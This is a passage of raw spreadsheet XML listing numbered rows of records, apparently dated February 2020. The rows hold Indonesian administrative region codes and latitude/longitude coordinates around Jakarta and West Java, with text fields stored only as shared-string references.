      </c>
      <c r="W1239" s="5">
        <v>-619897</v>
      </c>
      <c r="X1239" t="s">
        <v>18986</v>
      </c>
      <c r="Y1239" t="str">
        <f t="shared" si="19"/>
        <v>-6.19897,106.85647</v>
      </c>
    </row>
    <row r="1240" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1240">
        <v>108811</v>
      </c>
      <c r="B1240" s="1">
        <v>43885</v>
      </c>
      <c r="C1240">
        <v>1</v>
      </c>
      <c r="D1240" t="s">
        <v>22</v>
      </c>
      <c r="E1240" t="s">
        <v>23</v>
      </c>
      <c r="F1240" t="s">
        <v>4540</v>
      </c>
      <c r="H1240" t="s">
        <v>26</v>
      </c>
      <c r="I1240" t="s">
        <v>197</v>
      </c>
      <c r="J1240" t="s">
        <v>3135</v>
      </c>
      <c r="L1240" t="s">
        <v>4541</v>
      </c>
      <c r="M1240">
        <v>3671021007</v>
      </c>
      <c r="N1240">
        <v>3671021</v>
      </c>
      <c r="O1240">
        <v>3671</v>
      </c>
      <c r="P1240">
        <v>36</v>
      </c>
      <c r="Q1240" t="s">
        <v>454</v>
      </c>
      <c r="R1240" t="s">
        <v>454</v>
      </c>
      <c r="S1240" t="s">
        <v>201</v>
      </c>
      <c r="T1240" t="s">
        <v>171</v>
      </c>
      <c r="U1240" s="5">
        <v>10669184</v>
      </c>
      <c r="V1240" s="5" t="s">
        <v>15603</v>
      </c>
      <c r="W1240" s="5">
        <v>-622058</v>
      </c>
      <c r="X1240" t="s">
        <v>19381</v>
      </c>
      <c r="Y1240" t="str">
        <f t="shared" si="19"/>
        <v>-6.22058,106.69184</v>
      </c>
    </row>
    <row r="1241" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1241">
        <v>108812</v>
      </c>
      <c r="B1241" s="1">
        <v>43885</v>
      </c>
      <c r="C1241">
        <v>1</v>
      </c>
      <c r="D1241" t="s">
        <v>22</v>
      </c>
      <c r="E1241" t="s">
        <v>23</v>
      </c>
      <c r="F1241" t="s">
        <v>4542</v>
      </c>
      <c r="G1241" t="s">
        <v>4543</v>
      </c>
      <c r="H1241" t="s">
        <v>26</v>
      </c>
      <c r="I1241" t="s">
        <v>1683</v>
      </c>
      <c r="J1241" t="s">
        <v>1879</v>
      </c>
      <c r="M1241">
        <v>3173080003</v>
      </c>
      <c r="N1241">
        <v>3173080</v>
      </c>
      <c r="O1241">
        <v>3173</v>
      </c>
      <c r="P1241">
        <v>31</v>
      </c>
      <c r="Q1241" t="s">
        <v>157</v>
      </c>
      <c r="R1241" t="s">
        <v>157</v>
      </c>
      <c r="S1241" t="s">
        <v>62</v>
      </c>
      <c r="T1241" t="s">
        <v>33</v>
      </c>
      <c r="U1241" s="5">
        <v>10682074</v>
      </c>
      <c r="V1241" s="5" t="s">
        <v>15604</v>
      </c>
      <c r="W1241" s="5">
        <v>-617811</v>
      </c>
      <c r="X1241" t="s">
        <v>19382</v>
      </c>
      <c r="Y1241" t="str">
        <f t="shared" si="19"/>
        <v>-6.17811,106.82074</v>
      </c>
    </row>
    <row r="1242" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1242">
        <v>108813</v>
      </c>
      <c r="B1242" s="1">
        <v>43885</v>
      </c>
      <c r="C1242">
        <v>1</v>
      </c>
      <c r="D1242" t="s">
        <v>22</v>
      </c>
      <c r="E1242" t="s">
        <v>23</v>
      </c>
      <c r="F1242" t="s">
        <v>4544</v>
      </c>
      <c r="G1242" t="s">
        <v>4545</v>
      </c>
      <c r="H1242" t="s">
        <v>26</v>
      </c>
      <c r="I1242" t="s">
        <v>290</v>
      </c>
      <c r="J1242" t="s">
        <v>2705</v>
      </c>
      <c r="L1242" t="s">
        <v>4546</v>
      </c>
      <c r="M1242">
        <v>3172090006</v>
      </c>
      <c r="N1242">
        <v>3172090</v>
      </c>
      <c r="O1242">
        <v>3172</v>
      </c>
      <c r="P1242">
        <v>31</v>
      </c>
      <c r="Q1242" t="s">
        <v>2283</v>
      </c>
      <c r="R1242" t="s">
        <v>890</v>
      </c>
      <c r="S1242" t="s">
        <v>49</v>
      </c>
      <c r="T1242" t="s">
        <v>33</v>
      </c>
      <c r="U1242" s="5">
        <v>10688227</v>
      </c>
      <c r="V1242" s="5" t="s">
        <v>15605</v>
      </c>
      <c r="W1242" s="5">
        <v>-616906</v>
      </c>
      <c r="X1242" t="s">
        <v>19383</v>
      </c>
      <c r="Y1242" t="str">
        <f t="shared" si="19"/>
        <v>-6.16906,106.88227</v>
      </c>
    </row>
    <row r="1243" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1243">
        <v>108814</v>
      </c>
      <c r="B1243" s="1">
        <v>43885</v>
      </c>
      <c r="C1243">
        <v>1</v>
      </c>
      <c r="D1243" t="s">
        <v>22</v>
      </c>
      <c r="E1243" t="s">
        <v>23</v>
      </c>
      <c r="F1243" t="s">
        <v>4547</v>
      </c>
      <c r="G1243" t="s">
        <v>4548</v>
      </c>
      <c r="H1243" t="s">
        <v>26</v>
      </c>
      <c r="I1243" t="s">
        <v>4549</v>
      </c>
      <c r="J1243" t="s">
        <v>1380</v>
      </c>
      <c r="L1243" t="s">
        <v>4550</v>
      </c>
      <c r="M1243">
        <v>3174070002</v>
      </c>
      <c r="N1243">
        <v>3174070</v>
      </c>
      <c r="O1243">
        <v>3174</v>
      </c>
      <c r="P1243">
        <v>31</v>
      </c>
      <c r="Q1243" t="s">
        <v>621</v>
      </c>
      <c r="R1243" t="s">
        <v>84</v>
      </c>
      <c r="S1243" t="s">
        <v>32</v>
      </c>
      <c r="T1243" t="s">
        <v>33</v>
      </c>
      <c r="U1243" s="5">
        <v>10674057</v>
      </c>
      <c r="V1243" s="5" t="s">
        <v>15606</v>
      </c>
      <c r="W1243" s="5">
        <v>-615534</v>
      </c>
      <c r="X1243" t="s">
        <v>19384</v>
      </c>
      <c r="Y1243" t="str">
        <f t="shared" si="19"/>
        <v>-6.15534,106.74057</v>
      </c>
    </row>
    <row r="1244" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1244">
        <v>108815</v>
      </c>
      <c r="B1244" s="1">
        <v>43885</v>
      </c>
      <c r="C1244">
        <v>1</v>
      </c>
      <c r="D1244" t="s">
        <v>22</v>
      </c>
      <c r="E1244" t="s">
        <v>23</v>
      </c>
      <c r="F1244" t="s">
        <v>4551</v>
      </c>
      <c r="G1244" t="s">
        <v>4552</v>
      </c>
      <c r="H1244" t="s">
        <v>26</v>
      </c>
      <c r="I1244" t="s">
        <v>4553</v>
      </c>
      <c r="J1244" t="s">
        <v>2725</v>
      </c>
      <c r="L1244" t="s">
        <v>4554</v>
      </c>
      <c r="M1244">
        <v>3172100005</v>
      </c>
      <c r="N1244">
        <v>3172100</v>
      </c>
      <c r="O1244">
        <v>3172</v>
      </c>
      <c r="P1244">
        <v>31</v>
      </c>
      <c r="Q1244" t="s">
        <v>1773</v>
      </c>
      <c r="R1244" t="s">
        <v>1436</v>
      </c>
      <c r="S1244" t="s">
        <v>49</v>
      </c>
      <c r="T1244" t="s">
        <v>33</v>
      </c>
      <c r="U1244" s="5">
        <v>10687017</v>
      </c>
      <c r="V1244" s="5" t="s">
        <v>14947</v>
      </c>
      <c r="W1244" s="5">
        <v>-619947</v>
      </c>
      <c r="X1244" t="s">
        <v>19385</v>
      </c>
      <c r="Y1244" t="str">
        <f t="shared" si="19"/>
        <v>-6.19947,106.87017</v>
      </c>
    </row>
    <row r="1245" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1245">
        <v>108816</v>
      </c>
      <c r="B1245" s="1">
        <v>43885</v>
      </c>
      <c r="C1245">
        <v>1</v>
      </c>
      <c r="D1245" t="s">
        <v>22</v>
      </c>
      <c r="E1245" t="s">
        <v>23</v>
      </c>
      <c r="F1245" t="s">
        <v>4555</v>
      </c>
      <c r="G1245" t="s">
        <v>4556</v>
      </c>
      <c r="H1245" t="s">
        <v>26</v>
      </c>
      <c r="I1245" t="s">
        <v>1624</v>
      </c>
      <c r="J1245" t="s">
        <v>4557</v>
      </c>
      <c r="L1245" t="s">
        <v>4558</v>
      </c>
      <c r="M1245">
        <v>3174060003</v>
      </c>
      <c r="N1245">
        <v>3174060</v>
      </c>
      <c r="O1245">
        <v>3174</v>
      </c>
      <c r="P1245">
        <v>31</v>
      </c>
      <c r="Q1245" t="s">
        <v>1762</v>
      </c>
      <c r="R1245" t="s">
        <v>1762</v>
      </c>
      <c r="S1245" t="s">
        <v>32</v>
      </c>
      <c r="T1245" t="s">
        <v>33</v>
      </c>
      <c r="U1245" s="5">
        <v>10682477</v>
      </c>
      <c r="V1245" s="5" t="s">
        <v>15607</v>
      </c>
      <c r="W1245" s="5">
        <v>-615689</v>
      </c>
      <c r="X1245" t="s">
        <v>19210</v>
      </c>
      <c r="Y1245" t="str">
        <f t="shared" si="19"/>
        <v>-6.15689,106.82477</v>
      </c>
    </row>
    <row r="1246" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1246">
        <v>108817</v>
      </c>
      <c r="B1246" s="1">
        <v>43885</v>
      </c>
      <c r="C1246">
        <v>1</v>
      </c>
      <c r="D1246" t="s">
        <v>22</v>
      </c>
      <c r="E1246" t="s">
        <v>23</v>
      </c>
      <c r="F1246" t="s">
        <v>4559</v>
      </c>
      <c r="H1246" t="s">
        <v>26</v>
      </c>
      <c r="I1246" t="s">
        <v>1513</v>
      </c>
      <c r="J1246" t="s">
        <v>4560</v>
      </c>
      <c r="L1246" t="s">
        <v>4561</v>
      </c>
      <c r="M1246">
        <v>3173030004</v>
      </c>
      <c r="N1246">
        <v>3173030</v>
      </c>
      <c r="O1246">
        <v>3173</v>
      </c>
      <c r="P1246">
        <v>31</v>
      </c>
      <c r="Q1246" t="s">
        <v>4562</v>
      </c>
      <c r="R1246" t="s">
        <v>3128</v>
      </c>
      <c r="S1246" t="s">
        <v>62</v>
      </c>
      <c r="T1246" t="s">
        <v>33</v>
      </c>
      <c r="U1246" s="5">
        <v>10684121</v>
      </c>
      <c r="V1246" s="5" t="s">
        <v>15608</v>
      </c>
      <c r="W1246" s="5">
        <v>-618065</v>
      </c>
      <c r="X1246" t="s">
        <v>19386</v>
      </c>
      <c r="Y1246" t="str">
        <f t="shared" si="19"/>
        <v>-6.18065,106.84121</v>
      </c>
    </row>
    <row r="1247" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1247">
        <v>108818</v>
      </c>
      <c r="B1247" s="1">
        <v>43885</v>
      </c>
      <c r="C1247">
        <v>1</v>
      </c>
      <c r="D1247" t="s">
        <v>22</v>
      </c>
      <c r="E1247" t="s">
        <v>23</v>
      </c>
      <c r="F1247" t="s">
        <v>4563</v>
      </c>
      <c r="G1247" t="s">
        <v>4564</v>
      </c>
      <c r="H1247" t="s">
        <v>26</v>
      </c>
      <c r="I1247" t="s">
        <v>1689</v>
      </c>
      <c r="J1247" t="s">
        <v>1596</v>
      </c>
      <c r="L1247" t="s">
        <v>4565</v>
      </c>
      <c r="M1247">
        <v>3173040001</v>
      </c>
      <c r="N1247">
        <v>3173040</v>
      </c>
      <c r="O1247">
        <v>3173</v>
      </c>
      <c r="P1247">
        <v>31</v>
      </c>
      <c r="Q1247" t="s">
        <v>1598</v>
      </c>
      <c r="R1247" t="s">
        <v>1598</v>
      </c>
      <c r="S1247" t="s">
        <v>62</v>
      </c>
      <c r="T1247" t="s">
        <v>33</v>
      </c>
      <c r="U1247" s="5">
        <v>10686069</v>
      </c>
      <c r="V1247" s="5" t="s">
        <v>14766</v>
      </c>
      <c r="W1247" s="5">
        <v>-618260</v>
      </c>
      <c r="X1247" t="s">
        <v>19387</v>
      </c>
      <c r="Y1247" t="str">
        <f t="shared" si="19"/>
        <v>-6.18260,106.86069</v>
      </c>
    </row>
    <row r="1248" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1248">
        <v>108819</v>
      </c>
      <c r="B1248" s="1">
        <v>43885</v>
      </c>
      <c r="C1248">
        <v>1</v>
      </c>
      <c r="D1248" t="s">
        <v>22</v>
      </c>
      <c r="E1248" t="s">
        <v>23</v>
      </c>
      <c r="F1248" t="s">
        <v>4566</v>
      </c>
      <c r="H1248" t="s">
        <v>26</v>
      </c>
      <c r="I1248" t="s">
        <v>753</v>
      </c>
      <c r="J1248" t="s">
        <v>3515</v>
      </c>
      <c r="L1248" t="s">
        <v>4567</v>
      </c>
      <c r="M1248">
        <v>3172090004</v>
      </c>
      <c r="N1248">
        <v>3172090</v>
      </c>
      <c r="O1248">
        <v>3172</v>
      </c>
      <c r="P1248">
        <v>31</v>
      </c>
      <c r="Q1248" t="s">
        <v>889</v>
      </c>
      <c r="R1248" t="s">
        <v>890</v>
      </c>
      <c r="S1248" t="s">
        <v>49</v>
      </c>
      <c r="T1248" t="s">
        <v>33</v>
      </c>
      <c r="U1248" s="5">
        <v>10690022</v>
      </c>
      <c r="V1248" s="5" t="s">
        <v>15609</v>
      </c>
      <c r="W1248" s="5">
        <v>-620160</v>
      </c>
      <c r="X1248" t="s">
        <v>19388</v>
      </c>
      <c r="Y1248" t="str">
        <f t="shared" si="19"/>
        <v>-6.20160,106.90022</v>
      </c>
    </row>
    <row r="1249" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1249">
        <v>108820</v>
      </c>
      <c r="B1249" s="1">
        <v>43885</v>
      </c>
      <c r="C1249">
        <v>1</v>
      </c>
      <c r="D1249" t="s">
        <v>22</v>
      </c>
      <c r="E1249" t="s">
        <v>23</v>
      </c>
      <c r="F1249" t="s">
        <v>4568</v>
      </c>
      <c r="G1249" t="s">
        <v>4569</v>
      </c>
      <c r="H1249" t="s">
        <v>26</v>
      </c>
      <c r="I1249" t="s">
        <v>36</v>
      </c>
      <c r="J1249" t="s">
        <v>2863</v>
      </c>
      <c r="M1249">
        <v>3172020003</v>
      </c>
      <c r="N1249">
        <v>3172020</v>
      </c>
      <c r="O1249">
        <v>3172</v>
      </c>
      <c r="P1249">
        <v>31</v>
      </c>
      <c r="Q1249" t="s">
        <v>1644</v>
      </c>
      <c r="R1249" t="s">
        <v>1644</v>
      </c>
      <c r="S1249" t="s">
        <v>49</v>
      </c>
      <c r="T1249" t="s">
        <v>33</v>
      </c>
      <c r="U1249" s="5">
        <v>10688230</v>
      </c>
      <c r="V1249" s="5" t="s">
        <v>15610</v>
      </c>
      <c r="W1249" s="5">
        <v>-632264</v>
      </c>
      <c r="X1249" t="s">
        <v>19389</v>
      </c>
      <c r="Y1249" t="str">
        <f t="shared" si="19"/>
        <v>-6.32264,106.88230</v>
      </c>
    </row>
    <row r="1250" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1250">
        <v>108821</v>
      </c>
      <c r="B1250" s="1">
        <v>43885</v>
      </c>
      <c r="C1250">
        <v>1</v>
      </c>
      <c r="D1250" t="s">
        <v>22</v>
      </c>
      <c r="E1250" t="s">
        <v>23</v>
      </c>
      <c r="F1250" t="s">
        <v>4570</v>
      </c>
      <c r="G1250" t="s">
        <v>4571</v>
      </c>
      <c r="H1250" t="s">
        <v>26</v>
      </c>
      <c r="I1250" t="s">
        <v>290</v>
      </c>
      <c r="J1250" t="s">
        <v>3575</v>
      </c>
      <c r="L1250" t="s">
        <v>4572</v>
      </c>
      <c r="M1250">
        <v>3172080003</v>
      </c>
      <c r="N1250">
        <v>3172080</v>
      </c>
      <c r="O1250">
        <v>3172</v>
      </c>
      <c r="P1250">
        <v>31</v>
      </c>
      <c r="Q1250" t="s">
        <v>2250</v>
      </c>
      <c r="R1250" t="s">
        <v>141</v>
      </c>
      <c r="S1250" t="s">
        <v>49</v>
      </c>
      <c r="T1250" t="s">
        <v>33</v>
      </c>
      <c r="U1250" s="5">
        <v>10694701</v>
      </c>
      <c r="V1250" s="5" t="s">
        <v>15611</v>
      </c>
      <c r="W1250" s="5">
        <v>-619549</v>
      </c>
      <c r="X1250" t="s">
        <v>19390</v>
      </c>
      <c r="Y1250" t="str">
        <f t="shared" si="19"/>
        <v>-6.19549,106.94701</v>
      </c>
    </row>
    <row r="1251" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1251">
        <v>108822</v>
      </c>
      <c r="B1251" s="1">
        <v>43885</v>
      </c>
      <c r="C1251">
        <v>1</v>
      </c>
      <c r="D1251" t="s">
        <v>22</v>
      </c>
      <c r="E1251" t="s">
        <v>23</v>
      </c>
      <c r="F1251" t="s">
        <v>4573</v>
      </c>
      <c r="G1251" t="s">
        <v>4574</v>
      </c>
      <c r="H1251" t="s">
        <v>26</v>
      </c>
      <c r="I1251" t="s">
        <v>473</v>
      </c>
      <c r="J1251" t="s">
        <v>2627</v>
      </c>
      <c r="L1251" t="s">
        <v>4575</v>
      </c>
      <c r="M1251">
        <v>3216081002</v>
      </c>
      <c r="N1251">
        <v>3216081</v>
      </c>
      <c r="O1251">
        <v>3216</v>
      </c>
      <c r="P1251">
        <v>32</v>
      </c>
      <c r="Q1251" t="s">
        <v>4182</v>
      </c>
      <c r="R1251" t="s">
        <v>2512</v>
      </c>
      <c r="S1251" t="s">
        <v>41</v>
      </c>
      <c r="T1251" t="s">
        <v>42</v>
      </c>
      <c r="U1251" s="5">
        <v>10703666</v>
      </c>
      <c r="V1251" s="5" t="s">
        <v>15612</v>
      </c>
      <c r="W1251" s="5">
        <v>-627071</v>
      </c>
      <c r="X1251" t="s">
        <v>19391</v>
      </c>
      <c r="Y1251" t="str">
        <f t="shared" si="19"/>
        <v>-6.27071,107.03666</v>
      </c>
    </row>
    <row r="1252" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1252">
        <v>108823</v>
      </c>
      <c r="B1252" s="1">
        <v>43885</v>
      </c>
      <c r="C1252">
        <v>1</v>
      </c>
      <c r="D1252" t="s">
        <v>22</v>
      </c>
      <c r="E1252" t="s">
        <v>23</v>
      </c>
      <c r="F1252" t="s">
        <v>4576</v>
      </c>
      <c r="G1252" t="s">
        <v>4577</v>
      </c>
      <c r="H1252" t="s">
        <v>26</v>
      </c>
      <c r="I1252" t="s">
        <v>715</v>
      </c>
      <c r="J1252" t="s">
        <v>2331</v>
      </c>
      <c r="L1252" t="s">
        <v>4578</v>
      </c>
      <c r="M1252">
        <v>3173050003</v>
      </c>
      <c r="N1252">
        <v>3173050</v>
      </c>
      <c r="O1252">
        <v>3173</v>
      </c>
      <c r="P1252">
        <v>31</v>
      </c>
      <c r="Q1252" t="s">
        <v>2333</v>
      </c>
      <c r="R1252" t="s">
        <v>589</v>
      </c>
      <c r="S1252" t="s">
        <v>62</v>
      </c>
      <c r="T1252" t="s">
        <v>33</v>
      </c>
      <c r="U1252" s="5">
        <v>10686627</v>
      </c>
      <c r="V1252" s="5" t="s">
        <v>15613</v>
      </c>
      <c r="W1252" s="5">
        <v>-618038</v>
      </c>
      <c r="X1252" t="s">
        <v>19392</v>
      </c>
      <c r="Y1252" t="str">
        <f t="shared" si="19"/>
        <v>-6.18038,106.86627</v>
      </c>
    </row>
    <row r="1253" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1253">
        <v>108824</v>
      </c>
      <c r="B1253" s="1">
        <v>43885</v>
      </c>
      <c r="C1253">
        <v>1</v>
      </c>
      <c r="D1253" t="s">
        <v>22</v>
      </c>
      <c r="E1253" t="s">
        <v>23</v>
      </c>
      <c r="F1253" t="s">
        <v>4579</v>
      </c>
      <c r="G1253" t="s">
        <v>4580</v>
      </c>
      <c r="H1253" t="s">
        <v>26</v>
      </c>
      <c r="I1253" t="s">
        <v>193</v>
      </c>
      <c r="J1253" t="s">
        <v>2627</v>
      </c>
      <c r="L1253" t="s">
        <v>4581</v>
      </c>
      <c r="M1253">
        <v>3275050001</v>
      </c>
      <c r="N1253">
        <v>3275050</v>
      </c>
      <c r="O1253">
        <v>3275</v>
      </c>
      <c r="P1253">
        <v>32</v>
      </c>
      <c r="Q1253" t="s">
        <v>4376</v>
      </c>
      <c r="R1253" t="s">
        <v>955</v>
      </c>
      <c r="S1253" t="s">
        <v>41</v>
      </c>
      <c r="T1253" t="s">
        <v>42</v>
      </c>
      <c r="U1253" s="5">
        <v>10696656</v>
      </c>
      <c r="V1253" s="5" t="s">
        <v>15614</v>
      </c>
      <c r="W1253" s="5">
        <v>-628047</v>
      </c>
      <c r="X1253" t="s">
        <v>19393</v>
      </c>
      <c r="Y1253" t="str">
        <f t="shared" si="19"/>
        <v>-6.28047,106.96656</v>
      </c>
    </row>
    <row r="1254" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1254">
        <v>108825</v>
      </c>
      <c r="B1254" s="1">
        <v>43885</v>
      </c>
      <c r="C1254">
        <v>1</v>
      </c>
      <c r="D1254" t="s">
        <v>22</v>
      </c>
      <c r="E1254" t="s">
        <v>23</v>
      </c>
      <c r="F1254" t="s">
        <v>4582</v>
      </c>
      <c r="G1254" t="s">
        <v>4583</v>
      </c>
      <c r="H1254" t="s">
        <v>26</v>
      </c>
      <c r="I1254" t="s">
        <v>517</v>
      </c>
      <c r="J1254" t="s">
        <v>2627</v>
      </c>
      <c r="L1254" t="s">
        <v>4584</v>
      </c>
      <c r="M1254">
        <v>3275040006</v>
      </c>
      <c r="N1254">
        <v>3275040</v>
      </c>
      <c r="O1254">
        <v>3275</v>
      </c>
      <c r="P1254">
        <v>32</v>
      </c>
      <c r="Q1254" t="s">
        <v>2185</v>
      </c>
      <c r="R1254" t="s">
        <v>100</v>
      </c>
      <c r="S1254" t="s">
        <v>41</v>
      </c>
      <c r="T1254" t="s">
        <v>42</v>
      </c>
      <c r="U1254" s="5">
        <v>10701759</v>
      </c>
      <c r="V1254" s="5" t="s">
        <v>15615</v>
      </c>
      <c r="W1254" s="5">
        <v>-623122</v>
      </c>
      <c r="X1254" t="s">
        <v>19394</v>
      </c>
      <c r="Y1254" t="str">
        <f t="shared" si="19"/>
        <v>-6.23122,107.01759</v>
      </c>
    </row>
    <row r="1255" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1255">
        <v>108826</v>
      </c>
      <c r="B1255" s="1">
        <v>43885</v>
      </c>
      <c r="C1255">
        <v>1</v>
      </c>
      <c r="D1255" t="s">
        <v>22</v>
      </c>
      <c r="E1255" t="s">
        <v>23</v>
      </c>
      <c r="F1255" t="s">
        <v>4585</v>
      </c>
      <c r="G1255" t="s">
        <v>4586</v>
      </c>
      <c r="H1255" t="s">
        <v>26</v>
      </c>
      <c r="I1255" t="s">
        <v>44</v>
      </c>
      <c r="J1255" t="s">
        <v>4587</v>
      </c>
      <c r="L1255" t="s">
        <v>4588</v>
      </c>
      <c r="M1255">
        <v>3173070001</v>
      </c>
      <c r="N1255">
        <v>3173070</v>
      </c>
      <c r="O1255">
        <v>3173</v>
      </c>
      <c r="P1255">
        <v>31</v>
      </c>
      <c r="Q1255" t="s">
        <v>322</v>
      </c>
      <c r="R1255" t="s">
        <v>323</v>
      </c>
      <c r="S1255" t="s">
        <v>62</v>
      </c>
      <c r="T1255" t="s">
        <v>33</v>
      </c>
      <c r="U1255" s="5">
        <v>10682942</v>
      </c>
      <c r="V1255" s="5" t="s">
        <v>15616</v>
      </c>
      <c r="W1255" s="5">
        <v>-616342</v>
      </c>
      <c r="X1255" t="s">
        <v>18680</v>
      </c>
      <c r="Y1255" t="str">
        <f t="shared" si="19"/>
        <v>-6.16342,106.82942</v>
      </c>
    </row>
    <row r="1256" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1256">
        <v>108827</v>
      </c>
      <c r="B1256" s="1">
        <v>43885</v>
      </c>
      <c r="C1256">
        <v>1</v>
      </c>
      <c r="D1256" t="s">
        <v>22</v>
      </c>
      <c r="E1256" t="s">
        <v>23</v>
      </c>
      <c r="F1256" t="s">
        <v>4589</v>
      </c>
      <c r="G1256" t="s">
        <v>4590</v>
      </c>
      <c r="H1256" t="s">
        <v>26</v>
      </c>
      <c r="I1256" t="s">
        <v>4591</v>
      </c>
      <c r="J1256" t="s">
        <v>4197</v>
      </c>
      <c r="L1256" t="s">
        <v>4592</v>
      </c>
      <c r="M1256">
        <v>3172020005</v>
      </c>
      <c r="N1256">
        <v>3172020</v>
      </c>
      <c r="O1256">
        <v>3172</v>
      </c>
      <c r="P1256">
        <v>31</v>
      </c>
      <c r="Q1256" t="s">
        <v>3744</v>
      </c>
      <c r="R1256" t="s">
        <v>1644</v>
      </c>
      <c r="S1256" t="s">
        <v>49</v>
      </c>
      <c r="T1256" t="s">
        <v>33</v>
      </c>
      <c r="U1256" s="5">
        <v>10687461</v>
      </c>
      <c r="V1256" s="5" t="s">
        <v>15617</v>
      </c>
      <c r="W1256" s="5">
        <v>-630329</v>
      </c>
      <c r="X1256" t="s">
        <v>19395</v>
      </c>
      <c r="Y1256" t="str">
        <f t="shared" si="19"/>
        <v>-6.30329,106.87461</v>
      </c>
    </row>
    <row r="1257" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1257">
        <v>108828</v>
      </c>
      <c r="B1257" s="1">
        <v>43885</v>
      </c>
      <c r="C1257">
        <v>1</v>
      </c>
      <c r="D1257" t="s">
        <v>22</v>
      </c>
      <c r="E1257" t="s">
        <v>23</v>
      </c>
      <c r="F1257" t="s">
        <v>4593</v>
      </c>
      <c r="G1257" t="s">
        <v>4594</v>
      </c>
      <c r="H1257" t="s">
        <v>26</v>
      </c>
      <c r="I1257" t="s">
        <v>4595</v>
      </c>
      <c r="J1257" t="s">
        <v>4596</v>
      </c>
      <c r="L1257" t="s">
        <v>4597</v>
      </c>
      <c r="M1257">
        <v>3173080005</v>
      </c>
      <c r="N1257">
        <v>3173080</v>
      </c>
      <c r="O1257">
        <v>3173</v>
      </c>
      <c r="P1257">
        <v>31</v>
      </c>
      <c r="Q1257" t="s">
        <v>4598</v>
      </c>
      <c r="R1257" t="s">
        <v>157</v>
      </c>
      <c r="S1257" t="s">
        <v>62</v>
      </c>
      <c r="T1257" t="s">
        <v>33</v>
      </c>
      <c r="U1257" s="5">
        <v>10681586</v>
      </c>
      <c r="V1257" s="5" t="s">
        <v>15618</v>
      </c>
      <c r="W1257" s="5">
        <v>-616129</v>
      </c>
      <c r="X1257" t="s">
        <v>19396</v>
      </c>
      <c r="Y1257" t="str">
        <f t="shared" si="19"/>
        <v>-6.16129,106.81586</v>
      </c>
    </row>
    <row r="1258" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1258">
        <v>108829</v>
      </c>
      <c r="B1258" s="1">
        <v>43885</v>
      </c>
      <c r="C1258">
        <v>1</v>
      </c>
      <c r="D1258" t="s">
        <v>22</v>
      </c>
      <c r="E1258" t="s">
        <v>23</v>
      </c>
      <c r="F1258" t="s">
        <v>4599</v>
      </c>
      <c r="G1258" t="s">
        <v>4600</v>
      </c>
      <c r="H1258" t="s">
        <v>26</v>
      </c>
      <c r="I1258" t="s">
        <v>1055</v>
      </c>
      <c r="J1258" t="s">
        <v>4601</v>
      </c>
      <c r="L1258" t="s">
        <v>4602</v>
      </c>
      <c r="M1258">
        <v>3173070002</v>
      </c>
      <c r="N1258">
        <v>3173070</v>
      </c>
      <c r="O1258">
        <v>3173</v>
      </c>
      <c r="P1258">
        <v>31</v>
      </c>
      <c r="Q1258" t="s">
        <v>2710</v>
      </c>
      <c r="R1258" t="s">
        <v>323</v>
      </c>
      <c r="S1258" t="s">
        <v>62</v>
      </c>
      <c r="T1258" t="s">
        <v>33</v>
      </c>
      <c r="U1258" s="5">
        <v>10683591</v>
      </c>
      <c r="V1258" s="5" t="s">
        <v>15619</v>
      </c>
      <c r="W1258" s="5">
        <v>-614848</v>
      </c>
      <c r="X1258" t="s">
        <v>19397</v>
      </c>
      <c r="Y1258" t="str">
        <f t="shared" si="19"/>
        <v>-6.14848,106.83591</v>
      </c>
    </row>
    <row r="1259" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1259">
        <v>108830</v>
      </c>
      <c r="B1259" s="1">
        <v>43885</v>
      </c>
      <c r="C1259">
        <v>1</v>
      </c>
      <c r="D1259" t="s">
        <v>22</v>
      </c>
      <c r="E1259" t="s">
        <v>23</v>
      </c>
      <c r="F1259" t="s">
        <v>4603</v>
      </c>
      <c r="G1259" t="s">
        <v>4604</v>
      </c>
      <c r="H1259" t="s">
        <v>26</v>
      </c>
      <c r="I1259" t="s">
        <v>838</v>
      </c>
      <c r="J1259" t="s">
        <v>4605</v>
      </c>
      <c r="M1259">
        <v>3172070004</v>
      </c>
      <c r="N1259">
        <v>3172070</v>
      </c>
      <c r="O1259">
        <v>3172</v>
      </c>
      <c r="P1259">
        <v>31</v>
      </c>
      <c r="Q1259" t="s">
        <v>2880</v>
      </c>
      <c r="R1259" t="s">
        <v>128</v>
      </c>
      <c r="S1259" t="s">
        <v>49</v>
      </c>
      <c r="T1259" t="s">
        <v>33</v>
      </c>
      <c r="U1259" s="5">
        <v>10694526</v>
      </c>
      <c r="V1259" s="5" t="s">
        <v>15620</v>
      </c>
      <c r="W1259" s="5">
        <v>-622713</v>
      </c>
      <c r="X1259" t="s">
        <v>19398</v>
      </c>
      <c r="Y1259" t="str">
        <f t="shared" si="19"/>
        <v>-6.22713,106.94526</v>
      </c>
    </row>
    <row r="1260" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1260">
        <v>108831</v>
      </c>
      <c r="B1260" s="1">
        <v>43885</v>
      </c>
      <c r="C1260">
        <v>1</v>
      </c>
      <c r="D1260" t="s">
        <v>22</v>
      </c>
      <c r="E1260" t="s">
        <v>23</v>
      </c>
      <c r="F1260" t="s">
        <v>4606</v>
      </c>
      <c r="G1260" t="s">
        <v>4607</v>
      </c>
      <c r="H1260" t="s">
        <v>26</v>
      </c>
      <c r="I1260" t="s">
        <v>974</v>
      </c>
      <c r="J1260" t="s">
        <v>1745</v>
      </c>
      <c r="M1260">
        <v>3175050003</v>
      </c>
      <c r="N1260">
        <v>3175050</v>
      </c>
      <c r="O1260">
        <v>3175</v>
